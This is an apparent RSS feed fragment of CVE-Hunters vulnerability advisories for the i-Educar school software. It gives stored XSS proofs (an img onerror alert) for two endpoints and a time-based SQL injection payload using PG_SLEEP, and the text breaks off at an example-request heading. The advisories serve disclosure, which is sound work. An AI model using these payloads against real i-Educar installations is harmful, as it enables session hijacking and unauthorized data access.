        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9724-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_nivel_ensino_cadphp&amp;#34;&amp;gt;CVE-2025-9724: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9724&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9724&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_nivel&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9724-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_nivel_ensino_cadphp&amp;#34;&amp;gt;CVE-2025-9724: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9724&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9724&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_nivel&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nm_nivel&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nm_nivel&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9724/image.png&amp;#34;
	width=&amp;#34;572&amp;#34;
	height=&amp;#34;212&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9724/image_hu_f1ad93c28c15da33.png 480w, /p/cve-2025-9724/image_hu_82e5db05c0ce4244.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;269&amp;#34;
		data-flex-basis=&amp;#34;647px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9724/image-1.png&amp;#34;
	width=&amp;#34;572&amp;#34;
	height=&amp;#34;223&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9724/image-1_hu_d0f78472b39dbbb3.png 480w, /p/cve-2025-9724/image-1_hu_1f1d3d37f56155fa.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;256&amp;#34;
		data-flex-basis=&amp;#34;615px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9724.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9724.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9738</title>
        <link>https://www.cvehunters.com/p/cve-2025-9738/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9738/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9738-cross-site-scripting-xss-stored-endpoint-educar_tipo_ensino_cadphp-parameter-nm_tipo&amp;#34;&amp;gt;CVE-2025-9738: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9738&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9738&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9738-cross-site-scripting-xss-stored-endpoint-educar_tipo_ensino_cadphp-parameter-nm_tipo&amp;#34;&amp;gt;CVE-2025-9738: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9738&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9738&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9738/image.png&amp;#34;
	width=&amp;#34;582&amp;#34;
	height=&amp;#34;226&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9738/image_hu_8e88176a8609165e.png 480w, /p/cve-2025-9738/image_hu_2cdba1b0a67e9e2a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;257&amp;#34;
		data-flex-basis=&amp;#34;618px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9738.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9738.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9684</title>
        <link>https://www.cvehunters.com/p/cve-2025-9684/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9684/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9684-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleformulamediaedit-endpoint&amp;#34;&amp;gt;CVE-2025-9684: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9684&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9684&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9684-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleformulamediaedit-endpoint&amp;#34;&amp;gt;CVE-2025-9684: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9684&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9684&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
